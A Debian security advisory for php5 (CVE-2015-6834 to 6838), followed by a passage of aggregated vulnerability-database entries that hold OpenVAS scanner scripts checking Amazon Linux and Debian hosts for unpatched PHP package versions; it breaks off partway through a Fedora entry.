-------------------------------------------------------------------------
Debian Security Advisory DSA-3358-1 security@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 13, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------
Package : php5
CVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 CVE-2015-6838
Several vulnerabilities were found in PHP, a general-purpose scripting
language commonly used for web application development.
The vulnerabilities are addressed by upgrading PHP to new upstream
versions (5.4.45 and 5.6.13), which include additional bug fixes. Please
refer to the upstream changelog for more information:
https://php.net/ChangeLog-5.php#5.4.45
https://php.net/ChangeLog-5.php#5.6.13
For the oldstable distribution (wheezy), these problems have been fixed
in version 5.4.45-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in
version 5.6.13+dfsg-0+deb8u1.
We recommend that you upgrade your php5 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
{"openvas": [{"lastseen": "2020-03-17T22:56:25", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-670)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120660", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120660", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120660\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:05:04 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-670)\");\n script_tag(name:\"insight\", value:\"A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. 
An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838 )A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836 )\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-670.html\");\n script_cve_id(\"CVE-2015-6838\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:54", "description": "Several vulnerabilities were found in\nPHP, a general-purpose 
scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.4.45\nhttps://php.net/ChangeLog-5.php#5.6.13", "cvss3": {}, "published": "2015-09-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3358-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703358", "href": "http://plugins.openvas.org/nasl.php?oid=703358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3358.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3358-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703358);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_name(\"Debian Security Advisory DSA 3358-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-09-13 00:00:00 +0200 (Sun, 13 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3358.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. 
Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.4.45https://php.net/ChangeLog-5.php#5.6.13\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) 
{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u1\", 
rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:59", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.", "cvss3": {}, "published": "2015-09-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3358-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", 
"CVE-2015-6838"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3358.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3358-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703358\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_name(\"Debian Security Advisory DSA 3358-1 (php5 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-13 00:00:00 +0200 (Sun, 13 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3358.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe 
vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != 
NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2015-14976", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869939", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-14976\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
